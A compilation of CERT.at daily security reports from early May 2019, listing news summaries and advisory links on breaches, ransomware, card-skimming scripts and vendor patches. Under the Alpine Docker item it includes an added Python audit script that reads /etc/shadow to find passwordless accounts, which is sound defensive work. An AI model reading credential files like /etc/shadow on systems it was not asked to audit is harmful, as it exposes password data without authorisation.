∗∗∗ Linux kernel vulnerability CVE-2018-13405 ∗∗∗
---------------------------------------------
https://support.f5.com/csp/article/K00854051
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 08-05-2019 18:00 − Thursday 09-05-2019 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Samsung: researcher was able to access development environment ∗∗∗
---------------------------------------------
Credentials, certificates, tokens, keys and source code: a security researcher found a publicly accessible GitLab installation belonging to Samsung, and could even have modified the software code.
---------------------------------------------
https://www.golem.de/news/samsung-forscher-konnte-auf-entwicklungsumgebung-…
∗∗∗ Eggheads confirm: Rampant Android bloatware a privacy and security hellscape ∗∗∗
---------------------------------------------
Bundled software is not just an annoyance, it's also a risk. The apps bundled with many Android phones present threats to security and privacy greater than most users think.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2019/05/09/android_blo…
∗∗∗ Ongoing Credit Card Data Leak ∗∗∗
---------------------------------------------
Our DNSMon flagged an abnormal domain name, magento-analytics[.]com. Through continuous tracking and correlation with various data, we found that the domain has been used to inject malicious JS into various online shopping sites to steal credit card owner names, card numbers, expiration dates and CVV information.
---------------------------------------------
https://blog.netlab.360.com/ongoing-credit-card-data-leak/
∗∗∗ Critical flaw: Alpine Linux Docker images with root access and no password ∗∗∗
---------------------------------------------
Some versions of the official Alpine Linux Docker images allowed logging in as root with an empty password field. The problem has now been fixed.
---------------------------------------------
https://heise.de/-4418636
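The flaw is a one-field check away from being caught in a build pipeline: an empty second field in /etc/shadow means "no password", which is different from the locked markers "!" and "*". The Python below is an added example, not the Alpine project's fix or scanner: it parses shadow-format lines and lists accounts that can authenticate with an empty password. The shadow content is constructed, and the non-empty hash is a placeholder, not a real one.

```python
"""Detect local accounts that can log in without a password by reading
/etc/shadow. Added example; the shadow lines below are constructed samples."""
import sys

# Constructed /etc/shadow: root has an empty hash field (the bug class here),
# bin is locked with '!', user has a placeholder hash, nobody is disabled with '*'.
SAMPLE_SHADOW = """\
root::17861:0:::::
bin:!::0:::::
user:$6$constructedsalt$constructedhashvalueNOTREAL:17861:0:99999:7:::
nobody:*:17861:0:::::
"""


def parse_shadow(text: str) -> list:
    """Return (name, password_field) pairs for every well-formed shadow line."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue  # not a shadow record
        entries.append((fields[0], fields[1]))
    return entries


def passwordless_accounts(text: str) -> list:
    """Accounts whose password field is empty. '!' and '*' mean locked or
    disabled and are not reported; only the empty string is 'no password'."""
    return [name for name, pw in parse_shadow(text) if pw == ""]


def check_file(path: str = "/etc/shadow") -> list:
    """Run the check against a real shadow file (needs root to read it)."""
    with open(path, encoding="utf-8") as fh:
        return passwordless_accounts(fh.read())


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    hits = check_file(target) if target else passwordless_accounts(SAMPLE_SHADOW)
    print("passwordless accounts:", hits or "none")
```

In an image scan, run check_file against the extracted rootfs (for example /etc/shadow under the unpacked layer); a hit matters as soon as any login path reaches the local password check, such as an SSH daemon or a PAM-backed service added on top of the base image.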
∗∗∗ Vulnerabilities in financial mobile apps put consumers and businesses at risk ∗∗∗
---------------------------------------------
It’s good to know that your bank’s website boasts that little green padlock, promotes secure communication, and follows a two-factor authentication (2FA) scheme. But are their mobile apps equally secure?
---------------------------------------------
https://blog.malwarebytes.com/101/2019/05/vulnerabilities-in-financial-mobi…
∗∗∗ Vulnerability Spotlight: Remote code execution bug in SQLite ∗∗∗
---------------------------------------------
SQLite contains an exploitable use-after-free vulnerability that could allow an attacker to gain the ability to remotely execute code on the victim machine.
---------------------------------------------
https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-remote-c…
∗∗∗ Stay away from elektriker-mg.at ∗∗∗
---------------------------------------------
Better not hire elektriker-mg.at when you have a problem, because this company is fraudulent. elektriker-mg.at advertises on its website that it is available 24 hours a day, 365 days a year and will be at your door in no time. The electrician's friendly smile is deceptive: you will be cheated out of a lot of money and your problem will not be fixed!
---------------------------------------------
https://www.watchlist-internet.at/news/finger-weg-von-elektriker-mgat/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (drupal7, exiv2, filezilla, and libfilezilla), openSUSE (gnutls, GraphicsMagick, hostinfo, supportutils, and ovmf), Scientific Linux (flatpak and ghostscript), SUSE (mutt and samba), and Ubuntu (Monit).
---------------------------------------------
https://lwn.net/Articles/787943/
∗∗∗ Phar Vulnerabilities Patched in Drupal, TYPO3 ∗∗∗
---------------------------------------------
Updates released this week for the Drupal and TYPO3 open source content management systems (CMSs) patch vulnerabilities related to how Phar archives are handled. The Phar (PHP Archive) package format enables developers to place all the files of a PHP application inside a single archive.
---------------------------------------------
https://www.securityweek.com/phar-vulnerabilities-patched-drupal-typo3
∗∗∗ Kaspersky Anti-Virus: Vulnerability allows execution of arbitrary code with administrator privileges ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K19-0387
∗∗∗ IBM Security Bulletin: Cross-site scripting in IBM Business Automation Workflow and IBM Business Process Manager (BPM) (CVE-2019-4204) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-cross-site-scripting-…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Application Dependency Discovery Manager (TADDM) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: IBM DataPower Gateway is affected by a message spoofing vulnerability (CVE-2019-6110) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-datapower-gateway…
∗∗∗ IBM Security Bulletin: A vulnerability in IBM Cloud App Management V2018 could allow an attacker to obtain sensitive configuration information ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-a-vulnerability-in-ib…
∗∗∗ IBM Security Bulletin: Vulnerability in OpenSSL affects IBM Integrated Analytics System ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vulnerability-in-open…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM SDK Java Technology Edition affect IBM Cloud App Management V2018.4.1 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: A vulnerability in Apache Tomcat could affect IBM Cloud App Management V2018 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-a-vulnerability-in-ap…
∗∗∗ IBM Security Bulletin: Financial Transaction Manager for Corporate Payment Services is affected by a potential cross-site request forgery vulnerability (CVE-2018-1790) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-financial-transaction…
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 07-05-2019 18:00 − Wednesday 08-05-2019 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Hackers wanted: "Even ten-year-olds understand what a secure password is" ∗∗∗
---------------------------------------------
Starting now, the Cyber Security Challenge is once again looking for Austria's best hackers.
---------------------------------------------
https://futurezone.at/digital-life/hacker-gesucht-auch-zehnjaehrige-versteh…
∗∗∗ Biometric Authentication Overview, Advantages & Disadvantages [Updated 2019] ∗∗∗
---------------------------------------------
What is biometric authentication? Biometric authentication is simply the process of verifying your identity using your measurements or other unique characteristics of your body, then logging you in a service, an app, a device and so on. What’s complicated is the technology behind it, so let’s see how it works.
---------------------------------------------
https://heimdalsecurity.com/blog/biometric-authentication/
∗∗∗ Researchers’ Evil Clippy cloaks malicious Office macros ∗∗∗
---------------------------------------------
A team of security researchers has exploited Microsoft’s patchy macro documentation to hide malicious code inside innocent-looking macros.
---------------------------------------------
https://nakedsecurity.sophos.com/2019/05/08/researchers-cloak-malicious-off…
∗∗∗ Companies beware: job applications carrying malware in circulation ∗∗∗
---------------------------------------------
Generically worded emails with the subject „Bewerbung für Ihre Stellenausschreibung“ (application for your job posting) are currently being distributed by criminals. The messages contain a password-protected, and therefore encrypted, Word document. The corresponding password can be found in the email. Recipients must not open the attachment. It contains malware!
---------------------------------------------
https://www.watchlist-internet.at/news/unternehmen-aufgepasst-bewerbungen-m…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Elastic Services Controller REST API Authentication Bypass Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the REST API of Cisco Elastic Services Controller (ESC) could allow an unauthenticated, remote attacker to bypass authentication on the REST API. The vulnerability is due to improper validation of API requests. An attacker could exploit this vulnerability by sending a crafted request to the REST API. A successful exploit could allow the attacker to execute arbitrary actions through the REST API with administrative privileges on an affected system.
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Arch Linux (dovecot, kernel, linux-zen, munin, nautilus, perl-email-address, and tcpreplay), Debian (atftp), Fedora (perl-YAML and teeworlds), Mageia (java-1.8.0-openjdk, ldb, libsolv, and putty/filezilla/wxgtk), openSUSE (freeradius-server, libjpeg-turbo, pacemaker, rubygem-actionpack-5_1, wpa_supplicant, and yubico-piv-tool), Red Hat (chromium-browser, container-tools:rhel8, edk2, firefox, flatpak, ghostscript, httpd:2.4, mod_auth_mellon, openwsman, [...]
---------------------------------------------
https://lwn.net/Articles/787842/
∗∗∗ [20190502] - Core - By-passing protection of Phar Stream Wrapper Interceptor ∗∗∗
---------------------------------------------
http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/vyaXtvewK3I/781-20190502-c…
∗∗∗ [20190501] - Core - XSS in com_users ACL debug views ∗∗∗
---------------------------------------------
http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/xio2qb8Db2U/780-20190501-c…
∗∗∗ TYPO3-PSA-2019-008: By-passing protection of Phar Stream Wrapper Interceptor ∗∗∗
---------------------------------------------
https://typo3.org/security/advisory/typo3-psa-2019-008/
∗∗∗ TYPO3-PSA-2019-007: By-passing protection of Phar Stream Wrapper Interceptor ∗∗∗
---------------------------------------------
https://typo3.org/security/advisory/typo3-psa-2019-007/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Rational Directory Server (Tivoli) & Rational Directory Administrator ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Installation Manager and IBM Packaging Utility ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Session Management vulnerability affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2019-4072) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-session-management-vu…
∗∗∗ IBM Security Bulletin: Potential CSV injection threat affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2019-4071) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-potential-csv-injecti…
∗∗∗ IBM Security Bulletin: IBM Security Guardium is affected by a Spring Framework vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-security-guardium…
∗∗∗ IBM Security Bulletin: Potential denial of service in WebSphere Application Server affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center) (CVE-2018-10237) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-potential-denial-of-s…
∗∗∗ IBM Security Bulletin: IBM MQ Advanced Cloud Pak is vulnerable to a buffer overflow in the curl command (CVE-2018-16842) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-mq-advanced-cloud…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Host On-Demand ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Planning ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Security vulnerabilities have been identified in IBM Java Runtime and the microcode shipped with the DS8000 Hardware Management Console (HMC) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-security-vulnerabilit…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 06-05-2019 18:00 − Tuesday 07-05-2019 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Confluence Servers Hacked to Install Miners and Rootkits ∗∗∗
---------------------------------------------
After getting pounded with ransomware and malware for deploying distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now compromised to mine for cryptocurrency.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/confluence-servers-hacked-to…
∗∗∗ "7 Tips For Planning ICS Plant Visits" ∗∗∗
---------------------------------------------
As you plan the next visit to your ICS plant(s) with your security team, consider these seven tips. They will maximize time on-site for accurate asset identification, effective cybersecurity awareness that will foster IT and OT relationships for smooth ICS incident response, and highlight new ways to ethically hack your digital and physical security perimeter.
---------------------------------------------
http://ics.sans.org/blog/2019/05/06/7-tips-for-planning-ics-plant-visits
∗∗∗ Decryption tool for MegaLocker/NamPoHyu ransomware available ∗∗∗
---------------------------------------------
Security researchers have released a free decryption tool for a current ransomware strain. The malware developer does not find that funny at all.
---------------------------------------------
https://heise.de/-4415835
∗∗∗ Turla LightNeuron: An email too far ∗∗∗
---------------------------------------------
ESET research uncovers Microsoft Exchange malware remotely controlled via steganographic PDF and JPG email attachments
---------------------------------------------
https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/
∗∗∗ WordPress GraphQL plugin exploit ∗∗∗
---------------------------------------------
Third-party plugins are often the security Achilles heel of Content Management Systems (CMS). It seems like not a month goes by without one security researcher or another uncovering a vulnerability in a plugin, undermining the security of the whole platform.
---------------------------------------------
https://www.pentestpartners.com/security-blog/wordpress-graphql-plugin-expl…
∗∗∗ Surge of MegaCortex ransomware attacks detected ∗∗∗
---------------------------------------------
New MegaCortex ransomware strain detected targeting the enterprise sector.
---------------------------------------------
https://www.zdnet.com/article/sudden-surge-of-megacortex-ransomware-infecti…
∗∗∗ WordPress finally gets the security features a third of the Internet deserves ∗∗∗
---------------------------------------------
WordPress 5.2 released with support for cryptographically-signed updates, a modern cryptographic library.
---------------------------------------------
https://www.zdnet.com/article/wordpress-finally-gets-the-security-features-…
=====================
= Vulnerabilities =
=====================
∗∗∗ [20190501] - Core - XSS in com_users ACL debug views ∗∗∗
---------------------------------------------
Project: Joomla!
SubProject: CMS
Impact: Moderate
Severity: Low
Versions: 1.7.0 through 3.9.5
Exploit type: XSS
Reported Date: 2019-April-29
Fixed Date: 2019-May-07
CVE Number: CVE-2019-11809
Description: The debug views of com_users do not properly escape user supplied data, which leads to a potential XSS attack vector.
Affected Installs: Joomla! CMS versions 1.7.0 through 3.9.5
Solution: Upgrade to version 3.9.6
Contact: The JSST at the Joomla! Security Centre.
Reported By: Jose Antonio
---------------------------------------------
http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/xio2qb8Db2U/780-20190501-c…
∗∗∗ Android Security Bulletin - May 2019 ∗∗∗
---------------------------------------------
[...] The most severe of these issues is a critical security vulnerability in Media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.
---------------------------------------------
https://source.android.com/security/bulletin/2019-05-01.html
∗∗∗ USN-3969-1: wpa_supplicant and hostapd vulnerability ∗∗∗
---------------------------------------------
wpa vulnerability
A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 19.04, Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS
Summary: wpa_supplicant and hostapd could be made to crash if they received specially crafted network traffic.
---------------------------------------------
https://usn.ubuntu.com/3969-1/
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (389-ds-base, firefox-esr, and symfony), Fedora (poppler), SUSE (audit, ovmf, and webkit2gtk3), and Ubuntu (aria2, FFmpeg, gnome-shell, and sudo).
---------------------------------------------
https://lwn.net/Articles/787732/
∗∗∗ Security Bulletins for TYPO3 CMS ∗∗∗
---------------------------------------------
https://typo3.org/help/security-advisories/typo3-cms/
∗∗∗ Security Bulletins for TYPO3 Extensions ∗∗∗
---------------------------------------------
https://typo3.org/help/security-advisories/typo3-extensions/
∗∗∗ Public Services Announcements for TYPO3 ∗∗∗
---------------------------------------------
https://typo3.org/help/security-advisories/public-service-announcements/
∗∗∗ IBM Security Bulletin: Multiple Java Vulnerabilities Impact IBM Control Center (CVE-2018-3180, CVE-2018-1890) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-java-vulnera…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 03-05-2019 18:00 − Monday 06-05-2019 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
=====================
= News =
=====================
∗∗∗ Cronjob Backdoors ∗∗∗
---------------------------------------------
Attackers commonly rely on backdoors to easily gain reentry and maintain control over a website. They also use PHP functions to further deepen the level of their backdoors. A good example of this is the shell_exec function which allows plain shell commands to be run directly through the web application, providing attackers with an increased level of control over the environment.
---------------------------------------------
https://blog.sucuri.net/2019/05/cronjob-backdoors.html
∗∗∗ Wireless presenter systems with critical security vulnerabilities ∗∗∗
---------------------------------------------
WLAN gateways that enable wireless display of slides in many meeting rooms can be hijacked and infected with malicious code.
---------------------------------------------
https://heise.de/-4413258
∗∗∗ Extortion wave targets public Git repositories ∗∗∗
---------------------------------------------
For several days, extortionists have been deleting numerous repositories on GitHub, GitLab and BitBucket and demanding Bitcoins for their restoration.
---------------------------------------------
https://heise.de/-4413576
∗∗∗ Fraudulent job offers lure people into money laundering ∗∗∗
---------------------------------------------
When searching for a new job, consumers frequently come across fraudulent offers in which the task consists of forwarding sums of money. This is not always apparent from the job posting itself. This is what happened on the website bulldozer-sprachschule.at, taken over by criminals, where applicants were asked to launder money.
---------------------------------------------
https://www.watchlist-internet.at/news/betruegerische-job-angebote-verfuehr…
=====================
= Vulnerabilities =
=====================
∗∗∗ High-Severity PrinterLogic Flaws Enable Remote Code Execution ∗∗∗
---------------------------------------------
The three flaws enable an unauthenticated attacker to launch remote code execution attacks on printers.
---------------------------------------------
https://threatpost.com/printerlogic-remote-code-execution/144383/
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (jquery, librecad, and phpbb3), Fedora (bubblewrap, java-11-openjdk, libvirt, openssh, and pacemaker), Mageia (virtualbox), openSUSE (chromium, ImageMagick, and java-11-openjdk), and SUSE (openssl-1_1).
---------------------------------------------
https://lwn.net/Articles/787599/
∗∗∗ HPESBHF03769 rev.2 - HPE Integrated Lights-out 4 (iLO 4), and Moonshot Multiple Remote Vulnerabilities ∗∗∗
---------------------------------------------
https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_n…
∗∗∗ IBM Security Bulletin: IBM TRIRIGA is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data (CVE-2019-4208) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-tririga-is-vulner…
∗∗∗ IBM Security Bulletin: IBM TRIRIGA Application Platform may disclose sensitive information (CVE-2019-4207) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-tririga-applicati…
∗∗∗ IBM Security Bulletin: Vulnerability in Pivotal Spring Framework affects IBM TRIRIGA Application Platform (CVE-2018-15786) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vulnerability-in-pivo…
∗∗∗ IBM Security Bulletin: IBM TRIRIGA Application Platform could disclose sensitive information (CVE-2018-2008) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-tririga-applicati…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in Node.js affect IBM Cloud App Management V2018 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: IBM Cúram Social Program Management contains a cross-site request forgery vulnerability in the REST API (CVE-2018-2001) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-curam-social-prog…
∗∗∗ IBM Security Bulletin: Java Vulnerability Affects IBM Sterling Connect:Direct Browser User Interface (CVE-2018-1890, CVE-2018-3180) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-java-vulnerability-af…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Directory Server ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® Runtime Environment Java™ Version affect IBM Cloud Manager with OpenStack ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…
∗∗∗ IBM Security Bulletin: Vulnerabilities in GNU OpenSSL (1.0.2 series) affect IBM Netezza Analytics ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vulnerabilities-in-gn…
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 02-05-2019 18:00 − Friday 03-05-2019 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Decryptor for MegaLocker and NamPoHyu Virus Ransomware Released ∗∗∗
---------------------------------------------
Emsisoft has released a decryptor for the MegaLocker and NamPoHyu Virus ransomware that has been targeting exposed Samba servers. Victims can now use this decryptor to recover their files for free. [...]
---------------------------------------------
https://www.bleepingcomputer.com/news/security/decryptor-for-megalocker-and…
∗∗∗ Informal Expert Group on EU Member States Incident Response Development ∗∗∗
---------------------------------------------
ENISA launches this Call for Participation to invite experts to participate in its expert group.
---------------------------------------------
https://www.enisa.europa.eu/news/enisa-news/informal-e-xpert-group-on-eu-ms…
∗∗∗ 2019: The Return of Retefe ∗∗∗
---------------------------------------------
Retefe is a banking Trojan that historically has routed online banking traffic intended for targeted banks through a proxy instead of the web injects more typical of other bankers. [...] Although Retefe only appeared infrequently in 2018, the banker returned to more regular attacks on Swiss and German victims in April of 2019 with both a Windows and macOS version. Retefe's return to the landscape was marked by several noteworthy changes: [...]
---------------------------------------------
https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe
∗∗∗ Abus wireless alarm system: vulnerability allows cloning of RFID keys ∗∗∗
---------------------------------------------
Just last week, security researchers disclosed three vulnerabilities in Abus Secvest alarm systems. Now another one follows.
---------------------------------------------
https://heise.de/-4412282
∗∗∗ D-Link protects DNS-320 and other NAS devices against Cr1ptTor ransomware with updates ∗∗∗
---------------------------------------------
The DNS-320L, DNS-325 and DNS-327L network storage devices were vulnerable to attacks by the Cr1ptor encryption trojan. Firmware updates are meant to change that.
---------------------------------------------
https://heise.de/-4412656
∗∗∗ Vulnerabilities Found in Over 100 Jenkins Plugins ∗∗∗
---------------------------------------------
A researcher has discovered vulnerabilities in more than 100 plugins designed for the Jenkins open source software development automation server, and many of them have yet to be patched.
---------------------------------------------
https://www.securityweek.com/vulnerabilities-found-over-100-jenkins-plugins
=====================
= Vulnerabilities =
=====================
∗∗∗ Orpak SiteOmat ∗∗∗
---------------------------------------------
This advisory includes mitigations for use of hard-coded credentials, cross-site scripting, SQL injection, missing encryption of sensitive data, code injection, and stack-based buffer overflow vulnerabilities reported in Orpak’s SiteOmat, software for fuel station management.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-19-122-01
∗∗∗ GE Communicator ∗∗∗
---------------------------------------------
This advisory includes mitigations for uncontrolled search path, use of hard-coded credentials, and improper access control vulnerabilities reported in GE's Communicator software.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-19-122-02
∗∗∗ Sierra Wireless AirLink ALEOS ∗∗∗
---------------------------------------------
This advisory includes mitigations for OS command injection, use of hard-coded credentials, unrestricted upload of file with dangerous type, cross-site scripting, cross-site request forgery, information exposure, and missing encryption of sensitive data vulnerabilities reported in the Sierra Wireless AirLink ALEOS products.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-19-122-03
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (linux-4.9 and otrs2), Fedora (gradle, java-1.8.0-openjdk, jetty, kernel, ruby, and runc), openSUSE (dovecot23, jasper, libsoup, ntfs-3g_ntfsprogs, and webkit2gtk3), SUSE (openssl), and Ubuntu (python-gnupg).
---------------------------------------------
https://lwn.net/Articles/787413/
∗∗∗ IBM Security Bulletin: Vyatta 5600 vRouter Software Patches – Releases 1801-w and 1801-y ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-vyatta-5600-vrouter-s…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affects IBM Storwize V7000 Unified ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilit…